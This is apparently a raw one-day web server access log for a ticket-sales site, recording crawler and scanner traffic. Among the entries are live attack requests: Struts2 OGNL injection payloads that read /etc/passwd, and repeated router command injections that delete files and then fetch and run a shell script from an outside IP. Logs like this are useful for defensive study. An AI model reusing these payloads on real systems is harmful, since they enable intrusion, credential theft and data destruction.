94.156.69.209 - - [17/Feb/2024:00:01:12 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 185.224.128.55 - - [17/Feb/2024:00:14:40 +0100] "GET / HTTP/1.1" 404 - 127.0.0.1 - - [17/Feb/2024:00:26:09 +0100] "GET / HTTP/1.1" 400 - 209.141.42.209 - - [17/Feb/2024:00:47:00 +0100] "GET / HTTP/1.1" 404 - 45.79.181.179 - - [17/Feb/2024:01:44:18 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.224.128.55 - - [17/Feb/2024:01:53:57 +0100] "GET / HTTP/1.1" 404 - 177.36.12.65 - - [17/Feb/2024:01:56:38 +0100] "GET / HTTP/1.1" 404 - 209.141.42.209 - - [17/Feb/2024:02:02:17 +0100] "GET / HTTP/1.1" 404 - 52.167.144.180 - - [17/Feb/2024:03:05:50 +0100] "GET /ticket2/opencms/sv/buy_safety/ HTTP/1.1" 200 67203 180.178.45.98 - - [17/Feb/2024:03:10:18 +0100] "GET /ticket2/opencms/portal/displayAPSForm.action?debug=command&expression=5022*4561 HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:20 +0100] "GET /ticket2/opencms/index.action?redirect:http://www.interact.sh/ HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:23 +0100] "POST /ticket2/opencms/integration/saveGangster.action HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:24 +0100] "GET /ticket2/opencms/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:37 +0100] "POST /ticket2/opencms/user.action HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:38 +0100] "POST /ticket2/opencms/login.action HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:39 +0100] "GET /ticket2/opencms/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:03:10:40 +0100] "POST /ticket2/opencms/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 302 - 180.178.45.98 - - [17/Feb/2024:03:11:01 +0100] "POST /ticket2/opencms/ HTTP/1.1" 302 - 180.178.45.98 - - [17/Feb/2024:03:16:15 +0100] "GET /ticket2/opencms/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 302 - 185.224.128.10 - - [17/Feb/2024:03:18:22 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 185.224.128.10 - - [17/Feb/2024:03:18:22 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 45.164.58.97 - - [17/Feb/2024:03:21:36 +0100] "GET / HTTP/1.1" 404 - 192.241.201.16 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 180.178.45.98 - - [17/Feb/2024:03:37:44 +0100] "GET /ticket2/opencms/?id=sZjDzt%25{128*128} HTTP/1.1" 302 - 180.178.45.98 - - [17/Feb/2024:03:37:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.11.89 - - [17/Feb/2024:03:38:54 +0100] "GET / HTTP/1.1" 404 - 45.128.232.210 - - [17/Feb/2024:03:43:12 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 205.210.31.255 - - [17/Feb/2024:03:48:36 +0100] "GET / HTTP/1.0" 404 - 83.97.73.245 - - [17/Feb/2024:04:09:35 +0100] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - 83.97.73.245 - - [17/Feb/2024:04:09:48 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67191 87.120.84.130 - - [17/Feb/2024:04:11:07 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 34.77.180.214 - - [17/Feb/2024:04:43:02 +0100] "GET / HTTP/1.1" 404 - 34.77.180.214 - - [17/Feb/2024:04:43:02 +0100] "GET /script HTTP/1.1" 404 - 34.77.180.214 - - [17/Feb/2024:04:43:03 +0100] "GET /login HTTP/1.1" 404 - 34.77.180.214 - - [17/Feb/2024:04:43:03 +0100] "GET /manager/html HTTP/1.1" 404 - 34.77.180.214 - - [17/Feb/2024:04:43:03 +0100] "GET /invoker/readonly HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:04:43:26 +0100] "GET / HTTP/1.1" 404 - 104.206.128.50 - - [17/Feb/2024:04:51:23 +0100] "GET / HTTP/1.1" 404 - 185.253.160.131 - - [17/Feb/2024:04:55:23 +0100] "GET / HTTP/1.1" 404 - 185.253.160.131 - - [17/Feb/2024:04:55:23 +0100] "GET / HTTP/1.1" 404 - 185.253.160.131 - - [17/Feb/2024:04:55:24 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.253.160.131 - - [17/Feb/2024:04:55:24 +0100] "GET / HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:05:01:47 +0100] "GET /ticket2/opencms/lui/ HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:05:01:49 +0100] "GET /ticket2/opencms/hub/ HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:05:03:35 +0100] "POST /ticket2/opencms/struts2-rest-showcase/orders/3 HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:05:03:37 +0100] "POST /ticket2/opencms/orders/3 HTTP/1.1" 404 - 45.128.232.40 - - [17/Feb/2024:05:08:40 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 180.178.45.98 - - [17/Feb/2024:05:16:41 +0100] "HEAD /ticket2/opencms/ HTTP/1.1" 302 - 109.107.77.241 - - [17/Feb/2024:05:19:06 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 - 45.128.232.210 - - [17/Feb/2024:05:27:17 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 23.26.220.6 - - [17/Feb/2024:05:27:38 +0100] "GET / HTTP/1.1" 404 - 23.26.220.6 - - [17/Feb/2024:05:27:38 +0100] "GET / HTTP/1.1" 404 - 23.26.220.6 - - [17/Feb/2024:05:27:40 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 23.26.220.6 - - [17/Feb/2024:05:27:41 +0100] "GET / HTTP/1.1" 404 - 184.105.247.254 - - [17/Feb/2024:05:30:03 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 35.202.9.133 - - [17/Feb/2024:05:37:25 +0100] "GET / HTTP/1.1" 404 - 146.19.24.28 - - [17/Feb/2024:05:41:48 +0100] "GET / HTTP/1.1" 404 - 184.105.247.254 - - [17/Feb/2024:05:44:43 +0100] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 - 149.102.232.95 - - [17/Feb/2024:05:47:28 +0100] "GET / HTTP/1.1" 404 - 149.102.232.95 - - [17/Feb/2024:05:47:28 +0100] "GET / HTTP/1.1" 404 - 149.102.232.95 - - [17/Feb/2024:05:47:28 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 149.102.232.95 - - [17/Feb/2024:05:47:29 +0100] "GET / HTTP/1.1" 404 - 170.130.187.18 - - [17/Feb/2024:05:50:04 +0100] "GET / HTTP/1.1" 404 - 84.239.14.186 - - [17/Feb/2024:05:50:43 +0100] "GET / HTTP/1.1" 404 - 84.239.14.186 - - [17/Feb/2024:05:50:43 +0100] "GET / HTTP/1.1" 404 - 84.239.14.186 - - [17/Feb/2024:05:50:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 84.239.14.186 - - [17/Feb/2024:05:50:44 +0100] "GET / HTTP/1.1" 404 - 93.42.222.164 - - [17/Feb/2024:06:02:06 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 - 84.239.40.241 - - [17/Feb/2024:06:08:44 +0100] "GET / HTTP/1.1" 404 - 84.239.40.241 - - [17/Feb/2024:06:08:44 +0100] "GET / HTTP/1.1" 404 - 84.239.40.241 - - [17/Feb/2024:06:08:45 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 84.239.40.241 - - [17/Feb/2024:06:08:45 +0100] "GET / HTTP/1.1" 404 - 83.97.73.245 - - [17/Feb/2024:06:21:05 +0100] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 - 66.249.72.197 - - [17/Feb/2024:06:22:17 +0100] "GET /ticket2/opencms/sv/buy/?page=1&edid=D5E74C45-3F08-B240-C54C-249FC09ABDCA HTTP/1.1" 200 78653 78.108.177.54 - - [17/Feb/2024:06:22:36 +0100] "GET / HTTP/1.0" 404 - 188.213.34.4 - - [17/Feb/2024:06:25:52 +0100] "GET / HTTP/1.1" 404 - 188.213.34.4 - - [17/Feb/2024:06:25:53 +0100] "GET / HTTP/1.1" 404 - 188.213.34.4 - - [17/Feb/2024:06:25:53 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 188.213.34.4 - - [17/Feb/2024:06:25:54 +0100] "GET / HTTP/1.1" 404 - 10.140.0.118 - - [17/Feb/2024:06:43:18 +0100] "GET / HTTP/1.1" 404 - 41.223.30.51 - - [17/Feb/2024:06:48:10 +0100] "GET /ticket2/opencms/ HTTP/1.0" 302 - 185.224.128.55 - - [17/Feb/2024:06:49:55 +0100] "GET / HTTP/1.1" 404 - 192.241.239.4 - - [17/Feb/2024:07:05:13 +0100] "GET /ticket2/opencms/actuator/health HTTP/1.1" 404 - 84.239.40.199 - - [17/Feb/2024:07:20:27 +0100] "GET / HTTP/1.1" 404 - 84.239.40.199 - - [17/Feb/2024:07:20:27 +0100] "GET / HTTP/1.1" 404 - 84.239.40.199 - - [17/Feb/2024:07:20:28 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 84.239.40.199 - - [17/Feb/2024:07:20:28 +0100] "GET / HTTP/1.1" 404 - 66.249.72.199 - - [17/Feb/2024:07:23:08 +0100] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2918 87.120.84.105 - - [17/Feb/2024:07:32:51 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 104.206.128.58 - - [17/Feb/2024:07:42:16 +0100] "GET / HTTP/1.0" 404 - 52.167.144.229 - - [17/Feb/2024:07:49:41 +0100] "GET /ticket2/opencms/fr/sport/fotbollsbiljetter/serie_a/lazio/ HTTP/1.1" 500 - 146.19.24.28 - - [17/Feb/2024:07:58:58 +0100] "GET / HTTP/1.1" 404 - 87.236.176.189 - - [17/Feb/2024:08:05:04 +0100] "GET / HTTP/1.1" 404 - 104.248.3.154 - - [17/Feb/2024:08:10:45 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 104.248.3.154 - - [17/Feb/2024:08:10:45 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67191 104.248.3.154 - - [17/Feb/2024:08:10:46 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 185.180.143.137 - - [17/Feb/2024:08:16:21 +0100] "GET /ticket2/opencms/remote/login HTTP/1.1" 404 - 188.213.34.4 - - [17/Feb/2024:08:34:59 +0100] "GET / HTTP/1.1" 404 - 188.213.34.4 - - [17/Feb/2024:08:34:59 +0100] "GET / HTTP/1.1" 404 - 188.213.34.4 - - [17/Feb/2024:08:35:00 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 188.213.34.4 - - [17/Feb/2024:08:35:00 +0100] "GET / HTTP/1.1" 404 - 146.19.24.28 - - [17/Feb/2024:08:37:52 +0100] "GET / HTTP/1.1" 404 - 104.140.188.22 - - [17/Feb/2024:08:41:34 +0100] "GET / HTTP/1.0" 404 - 185.224.128.10 - - [17/Feb/2024:08:47:21 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 185.224.128.10 - - [17/Feb/2024:08:47:21 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 52.167.144.194 - - [17/Feb/2024:08:58:08 +0100] "GET /ticket2/opencms/fr/sell/ HTTP/1.1" 302 - 52.167.144.194 - - [17/Feb/2024:08:58:11 +0100] "GET /ticket2/opencms/fr/login/?url=/fr/sell/ HTTP/1.1" 500 - 185.224.128.55 - - [17/Feb/2024:09:11:12 +0100] "GET / HTTP/1.1" 404 - 45.33.87.154 - - [17/Feb/2024:09:18:01 +0100] "GET / HTTP/1.1" 404 - 94.156.66.92 - - [17/Feb/2024:09:25:30 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 94.156.71.225 - - [17/Feb/2024:09:27:30 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 192.241.229.42 - - [17/Feb/2024:09:32:27 +0100] "GET / HTTP/1.1" 404 - 71.6.134.231 - - [17/Feb/2024:09:37:09 +0100] "???G???V??hW.F???m???v?~S???p??)^ &???????N?????<~?~?0?krh'V?_i?&?????/?0?+?,?? ??" 400 - 71.6.134.231 - - [17/Feb/2024:09:52:40 +0100] "GET / HTTP/1.1" 404 - 193.35.18.53 - - [17/Feb/2024:09:53:00 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 185.224.128.10 - - [17/Feb/2024:09:57:01 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 185.224.128.10 - - [17/Feb/2024:09:57:01 +0100] "GET /ticket2/opencms/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 146.19.24.28 - - [17/Feb/2024:10:00:00 +0100] "GET / HTTP/1.1" 404 - 185.180.140.6 - - [17/Feb/2024:10:44:12 +0100] "GET /ticket2/opencms/remote/login HTTP/1.1" 404 - 185.242.226.75 - - [17/Feb/2024:10:56:27 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 185.242.226.75 - - [17/Feb/2024:10:56:27 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.242.226.75 - - [17/Feb/2024:10:56:27 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67191 162.216.150.31 - - [17/Feb/2024:11:06:33 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 162.216.150.31 - - [17/Feb/2024:11:06:34 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67191 167.94.145.51 - - [17/Feb/2024:11:08:13 +0100] "GET / HTTP/1.1" 404 - 167.94.145.51 - - [17/Feb/2024:11:08:16 +0100] "GET / HTTP/1.1" 404 - 167.94.145.51 - - [17/Feb/2024:11:08:16 +0100] "PRI * HTTP/2.0" 505 - 146.19.24.28 - - [17/Feb/2024:11:12:43 +0100] "GET / HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:11:34:50 +0100] "GET / HTTP/1.1" 404 - 179.43.161.135 - - [17/Feb/2024:12:38:13 +0100] "GET / HTTP/1.1" 404 - 45.33.80.243 - - [17/Feb/2024:12:51:56 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.128.232.152 - - [17/Feb/2024:13:11:41 +0100] "CONNECT example.com:443 HTTP/1.1" 400 - 45.128.232.152 - - [17/Feb/2024:13:11:57 +0100] "??~G???k????H?[ 4??_????s??x^t ???*?\T?%? KN?g9=:?V?T???&?+?/?,?0????? ??" 400 - 40.77.167.73 - - [17/Feb/2024:13:15:13 +0100] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/sporting-gijon/ HTTP/1.1" 200 65783 165.154.129.151 - - [17/Feb/2024:13:17:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 146.19.24.28 - - [17/Feb/2024:13:32:06 +0100] "GET / HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:13:57:19 +0100] "GET / HTTP/1.1" 404 - 172.105.128.13 - - [17/Feb/2024:14:14:50 +0100] "GET / HTTP/1.1" 404 - 45.88.90.152 - - [17/Feb/2024:14:21:32 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 146.19.24.28 - - [17/Feb/2024:14:32:01 +0100] "GET / HTTP/1.1" 404 - 156.146.55.172 - - [17/Feb/2024:15:03:39 +0100] "GET / HTTP/1.1" 404 - 156.146.55.172 - - [17/Feb/2024:15:03:39 +0100] "GET / HTTP/1.1" 404 - 156.146.55.172 - - [17/Feb/2024:15:03:39 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 156.146.55.172 - - [17/Feb/2024:15:03:39 +0100] "GET / HTTP/1.1" 404 - 71.6.134.233 - - [17/Feb/2024:15:10:02 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 83.97.73.245 - - [17/Feb/2024:15:19:52 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - 65.49.20.121 - - [17/Feb/2024:15:36:28 +0100] "GET / HTTP/1.1" 404 - 65.49.20.109 - - [17/Feb/2024:15:37:16 +0100] "GET /favicon.ico HTTP/1.1" 404 - 65.49.20.97 - - [17/Feb/2024:15:37:50 +0100] "GET /?format=json HTTP/1.1" 404 - 65.49.20.113 - - [17/Feb/2024:15:38:14 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 - 167.248.133.189 - - [17/Feb/2024:15:38:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.248.133.189 - - [17/Feb/2024:15:38:52 +0100] "GET /ticket2/opencms/en HTTP/1.1" 200 67191 167.248.133.189 - - [17/Feb/2024:15:38:53 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 146.19.24.28 - - [17/Feb/2024:15:41:24 +0100] "GET / HTTP/1.1" 404 - 66.249.66.160 - - [17/Feb/2024:15:43:22 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 66.249.66.161 - - [17/Feb/2024:15:43:23 +0100] "GET /ticket2/opencms/en/terms_of_service/ HTTP/1.1" 200 74480 83.97.73.245 - - [17/Feb/2024:15:46:38 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:16:11:28 +0100] "GET / HTTP/1.1" 404 - 192.241.199.87 - - [17/Feb/2024:16:21:54 +0100] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 - 185.224.128.10 - - [17/Feb/2024:16:31:17 +0100] "GET /ticket2/opencms/cgi-bin/jarrewrite.sh HTTP/1.1" 404 - 146.19.24.28 - - [17/Feb/2024:16:35:09 +0100] "GET / HTTP/1.1" 404 - 167.248.133.50 - - [17/Feb/2024:17:30:42 +0100] "GET / HTTP/1.1" 404 - 167.248.133.50 - - [17/Feb/2024:17:30:45 +0100] "GET / HTTP/1.1" 404 - 167.248.133.50 - - [17/Feb/2024:17:30:45 +0100] "PRI * HTTP/2.0" 505 - 40.77.167.27 - - [17/Feb/2024:17:53:00 +0100] "GET /ticket2/opencms/en/venue/?venueid=0282D494-85AE-5A8B-2A51-BC00F5E89183 HTTP/1.1" 200 63620 146.19.24.28 - - [17/Feb/2024:18:07:49 +0100] "GET / HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:18:10:05 +0100] "GET / HTTP/1.1" 404 - 52.167.144.19 - - [17/Feb/2024:18:15:05 +0100] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B HTTP/1.1" 200 73775 8.209.68.21 - - [17/Feb/2024:18:43:50 +0100] "POST /ticket2/opencms/dns-query HTTP/1.1" 404 - 103.117.229.4 - - [17/Feb/2024:18:47:38 +0100] "GET / HTTP/1.1" 404 - 8.209.68.21 - - [17/Feb/2024:18:51:29 +0100] "GET /ticket2/opencms/dns-query?dns=pJ8BAAABAAAAAAAABHRlc3QJbWVzaHRydXN0BHdvcmsAAAEAAQ HTTP/1.1" 404 - 185.242.226.75 - - [17/Feb/2024:19:24:55 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.242.226.75 - - [17/Feb/2024:19:24:56 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67191 146.19.24.28 - - [17/Feb/2024:19:51:33 +0100] "GET / HTTP/1.1" 404 - 185.224.128.55 - - [17/Feb/2024:20:17:06 +0100] "GET / HTTP/1.1" 404 - 34.79.162.186 - - [17/Feb/2024:20:20:37 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 156.146.55.167 - - [17/Feb/2024:20:59:03 +0100] "GET / HTTP/1.1" 404 - 156.146.55.167 - - [17/Feb/2024:20:59:03 +0100] "GET / HTTP/1.1" 404 - 156.146.55.167 - - [17/Feb/2024:20:59:03 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 156.146.55.167 - - [17/Feb/2024:20:59:04 +0100] "GET / HTTP/1.1" 404 - 185.91.69.110 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 198.199.105.28 - - [17/Feb/2024:21:01:37 +0100] "GET /manager/text/list HTTP/1.1" 404 - 185.91.69.110 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 185.91.69.110 - - [17/Feb/2024:21:01:49 +0100] "GET / HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:50 +0100] "POST / HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:50 +0100] "POST / HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:50 +0100] "GET /WuEL HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:51 +0100] "GET stager64 HTTP/1.1" 400 - 185.91.69.110 - - [17/Feb/2024:21:01:52 +0100] "GET /a HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:53 +0100] "GET /download/file.ext HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:54 +0100] "GET /SiteLoader HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:54 +0100] "GET /mPlayer HTTP/1.1" 404 - 185.91.69.110 - - [17/Feb/2024:21:01:55 +0100] "POST / HTTP/1.1" 404 - 103.149.26.131 - - [17/Feb/2024:21:15:12 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 - 94.156.66.82 - - [17/Feb/2024:21:18:07 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 - 193.35.18.53 - - [17/Feb/2024:21:41:20 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 146.19.24.28 - - [17/Feb/2024:21:52:42 +0100] "GET / HTTP/1.1" 404 - 80.66.83.114 - - [17/Feb/2024:22:20:22 +0100] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 400 - 80.66.83.114 - - [17/Feb/2024:22:24:18 +0100] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 400 - 45.128.232.210 - - [17/Feb/2024:22:47:11 +0100] "CONNECT google.com:443 HTTP/1.1" 400 - 78.153.140.177 - - [17/Feb/2024:22:53:22 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 114.119.146.98 - - [17/Feb/2024:22:54:25 +0100] "GET /ticket2/opencms/fr/sport/fotbollsbiljetter/premier_league/liverpool/ HTTP/1.1" 500 - 185.224.128.55 - - [17/Feb/2024:23:07:20 +0100] "GET / HTTP/1.1" 404 - 91.92.249.84 - - [17/Feb/2024:23:12:16 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 47.90.254.226 - - [17/Feb/2024:23:13:18 +0100] "POST /ticket2/opencms/dns-query HTTP/1.1" 404 - 47.90.254.226 - - [17/Feb/2024:23:22:27 +0100] "GET /ticket2/opencms/dns-query?dns=zMcBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/1.1" 404 - 146.19.24.28 - - [17/Feb/2024:23:25:56 +0100] "GET / HTTP/1.1" 404 - 40.77.167.54 - - [17/Feb/2024:23:29:20 +0100] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=F03B8ADD-988E-AE6A-8DBA-AF502C691C60 HTTP/1.1" 200 73782 167.94.146.55 - - [17/Feb/2024:23:47:03 +0100] "GET / HTTP/1.1" 404 - 167.94.146.55 - - [17/Feb/2024:23:47:06 +0100] "GET / HTTP/1.1" 404 - 167.94.146.55 - - [17/Feb/2024:23:47:07 +0100] "PRI * HTTP/2.0" 505 - 167.248.133.123 - - [17/Feb/2024:23:56:03 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 - 167.248.133.123 - - [17/Feb/2024:23:56:07 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.248.133.123 - - [17/Feb/2024:23:56:17 +0100] "GET /ticket2/opencms/en HTTP/1.1" 200 67191 167.248.133.123 - - [17/Feb/2024:23:56:19 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 141.98.11.89 - - [17/Feb/2024:23:58:24 +0100] "GET / HTTP/1.1" 404 -